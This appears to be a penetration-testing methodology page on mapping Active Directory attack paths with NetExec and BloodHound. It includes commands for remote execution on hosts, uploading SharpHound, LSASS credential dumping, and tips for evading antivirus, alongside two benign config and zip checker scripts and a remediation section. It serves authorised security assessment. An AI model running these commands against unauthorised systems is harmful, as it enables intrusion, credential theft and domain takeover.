## 🛡️ Methodology Checklist

- Configure NXC BloodHound sync: edit the `[BloodHound]` section of `~/.nxc/nxc.conf`
- Start Neo4j: `sudo neo4j start`
- Upload SharpHound: `nxc smb [TARGET] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe`
- Execute collection: `nxc smb [TARGET] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All"`
- Download ZIP: `nxc smb [TARGET] -u [USER] -p [PASS] --get-file [ZIP] bloodhound.zip`
- Import into BloodHound → drag-and-drop the ZIP into the GUI
- Run: “Shortest Paths to Domain Admins from Owned Principals”
- Alternatively: BloodHound.py from Linux if no Windows access
## 🎯 Operational Context

**Use when:** Valid domain credentials are available → run BloodHound collection via nxc without transferring SharpHound to the target.

**Think Dumber First:** `nxc ldap [DC] -u [USER] -p [PASS] --bloodhound -ns [DC_IP] -c All` → BloodHound data collection directly from nxc without touching the target. Produces a zip file ready for BloodHound import.

**Skip when:** SharpHound has already been collected from a domain-joined Windows host → Windows collection is more complete than LDAP-only nxc collection.
## ⚡ Tactical Cheatsheet

| Command | Tactical Outcome |
|---|---|
| `nano ~/.nxc/nxc.conf` | Configure BloodHound Neo4j connection settings |
| `sudo neo4j start` | Ensure Neo4j is running before NXC sync |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe` | Upload SharpHound collector to target |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All && dir c:\*_BloodHound.zip"` | Execute SharpHound and confirm output |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] --get-file [ZIP_FILENAME] bloodhound.zip` | Download SharpHound collection results |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS]` | Auto-marks user as owned in BH if BloodHound config is active |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] -M procdump` | Marks all users found in LSASS dump as owned in BloodHound |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] -M bh_owned -o PASS=[DB_PASS]` | Manually mark target COMPUTER node as owned in BloodHound |
| `bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All` | BloodHound.py: run from Linux without domain join |
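The `[BloodHound]` section of `~/.nxc/nxc.conf` is the part of this workflow that fails silently when it is wrong: an unparsable `bh_enabled`, the browser port instead of the Bolt port, or a stale `bh_pass` means nothing gets marked owned and the authentication error only shows up later. The following Python script is an added example, not NetExec's own code. It parses the section with `configparser` and reports the mistakes this page's troubleshooting notes describe. The key names and the `[YOUR_NEO4J_PASSWORD]` placeholder come from the config shown on this page; the embedded sample config and the check for port 7474 are constructed for the demonstration.

```python
"""Sanity-check the [BloodHound] section of ~/.nxc/nxc.conf before relying on
auto-owned sync. Added example (not part of NetExec); it only reads the file."""
import configparser
from pathlib import Path

# Keys the [BloodHound] section carries in the nxc.conf shown on this page.
REQUIRED_KEYS = ("bh_enabled", "bh_uri", "bh_port", "bh_user", "bh_pass")

# Constructed sample with the same layout as the section on this page.
SAMPLE_CONF = """
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = [YOUR_NEO4J_PASSWORD]
"""


def check_bloodhound_section(conf_text: str) -> list[str]:
    """Return a list of findings; an empty list means the section looks usable."""
    findings = []
    # interpolation=None so a real password containing '%' does not raise.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    if not cp.has_section("BloodHound"):
        return ["no [BloodHound] section: auto-owned sync cannot be enabled"]
    sec = cp["BloodHound"]
    for key in REQUIRED_KEYS:
        if key not in sec:
            findings.append(f"missing key: {key}")
    if findings:
        return findings
    # bh_enabled must parse as a boolean; anything else leaves sync off.
    try:
        if not sec.getboolean("bh_enabled"):
            findings.append("bh_enabled is not True: sync is off")
    except ValueError:
        findings.append(f"bh_enabled={sec['bh_enabled']!r} is not a boolean")
    # bh_port must be the Bolt port (7687 by default), not the browser port.
    try:
        port = sec.getint("bh_port")
        if not 1 <= port <= 65535:
            findings.append(f"bh_port={port} is out of range")
        elif port == 7474:
            findings.append("bh_port=7474 is the Neo4j browser port, not the Bolt port (7687)")
    except ValueError:
        findings.append(f"bh_port={sec['bh_port']!r} is not an integer")
    # A placeholder or never-changed password is the usual cause of
    # "sync fails (authentication error)".
    pw = sec["bh_pass"]
    if pw.startswith("[") and pw.endswith("]"):
        findings.append("bh_pass is still the placeholder from the template")
    elif pw == "neo4j":
        findings.append("bh_pass is the Neo4j first-login default; set the real password")
    elif not pw:
        findings.append("bh_pass is empty")
    return findings


def check_conf_file(path: Path = Path.home() / ".nxc" / "nxc.conf") -> list[str]:
    """Run the same checks against the real config file."""
    if not path.exists():
        return [f"{path} not found"]
    return check_bloodhound_section(path.read_text())


if __name__ == "__main__":
    for line in check_bloodhound_section(SAMPLE_CONF) or ["[BloodHound] section looks usable"]:
        print(line)
```

Run it as-is to check the embedded sample (which reports the untouched placeholder password); call `check_conf_file()` to check the real file before starting a collection that is supposed to sync.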
## 🔬 Deep Dive & Workflow

### BloodHound + NXC Configuration

```bash
# Edit NXC config to enable BloodHound sync
nano ~/.nxc/nxc.conf

# Add/modify the [BloodHound] section:
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = [YOUR_NEO4J_PASSWORD]

# Verify Neo4j is running:
sudo neo4j start
# → Check: http://localhost:7474

# With this config active, every successful NXC authentication auto-marks
# the compromised user as "Owned" in BloodHound
```

### SharpHound Deployment via NXC

```bash
# Download latest SharpHound collector first
wget https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.exe

# Step 1: Upload to target (must have admin access → (Pwn3d!))
nxc smb [TARGET_IP] -u [USER] -p [PASS] --put-file SharpHound.exe SharpHound.exe
# → uploads to C:\SharpHound.exe by default

# Step 2: Execute SharpHound with all collection methods
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "C:\SharpHound.exe -c All"
# Wait for collection to finish (may take several minutes in large environments)

# Step 3: Confirm output ZIP exists
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "dir c:\*_BloodHound.zip"
# → 20260505103045_BloodHound.zip

# Step 4: Download the ZIP
nxc smb [TARGET_IP] -u [USER] -p [PASS] --get-file "20260505103045_BloodHound.zip" bloodhound.zip

# Step 5: Import into BloodHound GUI
# → Drag-and-drop bloodhound.zip into BloodHound → Upload Data
```

### Alternative: BloodHound.py (From Linux)

```bash
# No need for a Windows target with admin → runs over LDAP/SMB from Linux
# Requires: valid domain credentials + DNS resolution to DC

# Add DC to /etc/hosts
echo "[DC_IP] [DC_FQDN]" >> /etc/hosts

# Run all collection methods
bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All
# → Outputs: computers.json, users.json, groups.json, domains.json, gpos.json, ous.json

# Zip and import:
zip bloodhound_data.zip *.json
# → Import into BloodHound GUI
```

### Automatic Owned Sync: Key Behaviors

```bash
# Works automatically (user marked owned):
nxc smb [TARGET_IP] -u [USER] -p [PASS]                # on (Pwn3d!)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassy      # all LSASS users
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M procdump    # all LSASS users

# Does NOT automatically sync (must use bh_owned module):
--ntds dump   # users from NTDS won't auto-sync
--lsa dump    # LSA secrets won't auto-sync

# Manually mark COMPUTER as owned:
nxc smb -M bh_owned --options   # see required parameters
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M bh_owned -o PASS=[NEO4J_PASS]
```

### BloodHound Key Queries After Collection

```text
-- Shortest path from owned principals to DA:
"Shortest Paths to Domain Admins from Owned Principals"

-- After marking computers/users owned, run:
"Find Shortest Paths to Domain Admins"
"Transitive Object Control" (for ACL chains)
"Users with DCSync Rights"
"Computers with Unconstrained Delegation"

-- Kerberos attack paths:
"Find AS-REP Roastable Users (Owned Principals)"
"Shortest Paths from Kerberoastable Users"
```

### Troubleshooting

```bash
# Sync fails (authentication error):
# → Check that bh_pass in nxc.conf matches the CURRENT neo4j password
# → Neo4j default is "neo4j" on first login → you set a new password → update nxc.conf

# Neo4j not running:
sudo neo4j start
# → Wait 30 seconds before retrying

# FQDN mapping (BloodHound needs the FQDN to match node names):
echo "[DC_IP] dc01.domain.local" >> /etc/hosts

# SharpHound AV detection:
# → If -M procdump or -x "SharpHound.exe" gets flagged:
# → Run BloodHound.py from Linux instead (no binary touches the target)
# → Or use an older SharpHound version / OPSEC-compiled variant
```

## 🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| `nxc --bloodhound` fails | Missing bloodhound module dependency | Install: `pip3 install bloodhound`; nxc depends on the bloodhound Python package |
| BloodHound zip import fails | Version mismatch | nxc uses a bloodhound.py-compatible format; import into BloodHound 4.x; CE may need a different format |
| Collection misses some edges | LDAP-only collection limitation | LDAP collection misses session data; run SharpHound from a domain-joined host for session edges |
| nxc bloodhound very slow | Large domain | Use `-c DCOnly` for faster DC-only collection; skip workstation session data for initial analysis |
| DNS resolution fails during collection | DC hostname not resolving | Add DC to /etc/hosts: `[DC_IP] [DC_FQDN]`; the `-ns [DC_IP]` flag sets the DNS server |
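Two of the rows above (the import failing on a version mismatch, and session edges missing from an LDAP-only collection) can be caught before the zip ever reaches the GUI. The following Python script is an added example, not part of BloodHound, bloodhound-python or NetExec. It assumes the BloodHound v4 JSON layout: each file holds one `data` list plus a `meta` block with `type`, `count` and `version`, and each computer object carries a `Sessions` block with a `Collected` flag. The sample zip it builds (two users, two computers, no sessions) is constructed for the demonstration.

```python
"""Pre-import check for a BloodHound.py / nxc --bloodhound collection zip.
Added example; assumes the BloodHound v4 JSON layout described in the lead-in."""
import io
import json
import zipfile


def build_sample_zip() -> bytes:
    """Constructed stand-in for bloodhound_data.zip: two users, two computers, no sessions."""
    def doc(kind, items, version=5):
        # meta.count is what the importer compares against the data list.
        return json.dumps({"data": items,
                           "meta": {"methods": 0, "type": kind, "count": len(items), "version": version}})

    users = [{"ObjectIdentifier": "S-1-5-21-1-1-1-1001", "Properties": {"name": "ALICE@DOMAIN.LOCAL"}},
             {"ObjectIdentifier": "S-1-5-21-1-1-1-1002", "Properties": {"name": "BOB@DOMAIN.LOCAL"}}]
    # Sessions.Collected=False is what an LDAP-only run leaves behind (assumed layout).
    computers = [{"ObjectIdentifier": "S-1-5-21-1-1-1-2001", "Properties": {"name": "DC01.DOMAIN.LOCAL"},
                  "Sessions": {"Results": [], "Collected": False, "FailureReason": None}},
                 {"ObjectIdentifier": "S-1-5-21-1-1-1-2002", "Properties": {"name": "WS01.DOMAIN.LOCAL"},
                  "Sessions": {"Results": [], "Collected": False, "FailureReason": None}}]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("users.json", doc("users", users))
        z.writestr("computers.json", doc("computers", computers))
        z.writestr("groups.json", doc("groups", []))
    return buf.getvalue()


def inspect_collection(zip_bytes: bytes) -> dict:
    """Summarise the zip and flag what typically breaks an import or leaves edges missing."""
    report = {"types": {}, "problems": [], "computers": 0, "sessions_collected": 0}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        names = [n for n in z.namelist() if n.endswith(".json")]
        if not names:
            report["problems"].append("zip contains no .json files")
            return report
        versions = set()
        for name in names:
            try:
                doc = json.loads(z.read(name))
            except json.JSONDecodeError:
                report["problems"].append(f"{name}: not valid JSON (truncated download?)")
                continue
            meta, data = doc.get("meta"), doc.get("data")
            if not isinstance(meta, dict) or not isinstance(data, list):
                report["problems"].append(f"{name}: missing meta/data, not a BloodHound v4 file")
                continue
            kind = meta.get("type", name)
            report["types"][kind] = len(data)
            versions.add(meta.get("version"))
            # A count/data mismatch is the usual signature of a partial file.
            if meta.get("count") != len(data):
                report["problems"].append(f"{name}: meta.count={meta.get('count')} but {len(data)} objects")
            if kind == "computers":
                report["computers"] = len(data)
                report["sessions_collected"] = sum(
                    1 for c in data if (c.get("Sessions") or {}).get("Collected"))
        # Files from different collector runs/versions will not import together cleanly.
        if len(versions) > 1:
            report["problems"].append(
                f"mixed meta.version values {sorted(map(str, versions))}: files from different collector runs?")
        if report["computers"] and report["sessions_collected"] == 0:
            report["problems"].append(
                "no computer has session data: LDAP-only collection, session edges will be missing")
    return report


if __name__ == "__main__":
    print(json.dumps(inspect_collection(build_sample_zip()), indent=2))
```

Feed `inspect_collection` the bytes of `bloodhound_data.zip` from the BloodHound.py workflow (or the downloaded SharpHound zip) and act on `problems` before importing: invalid JSON or a `meta.count` mismatch usually means a truncated download, mixed versions means files from different runs were zipped together, and zero collected sessions means the session edges the table above refers to are absent from this dataset.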
## 📝 Reporting Trigger

**Finding Title:** BloodHound Data Collection Reveals AD Attack Paths

**Impact:** BloodHound graph analysis identifies the shortest privilege escalation paths to Domain Admin, exposing ACL chains, Kerberoastable accounts, and delegation vulnerabilities that would require days of manual analysis to discover.

**Root Cause:** Active Directory configuration accumulated attack paths through normal IT operations without periodic security review.

**Recommendation:** Run BloodHound against your own AD environment regularly (quarterly). Remediate identified attack paths starting with the shortest paths to Domain Admin. Implement an AD tiering model to prevent a direct path from user workstations to Domain Admin.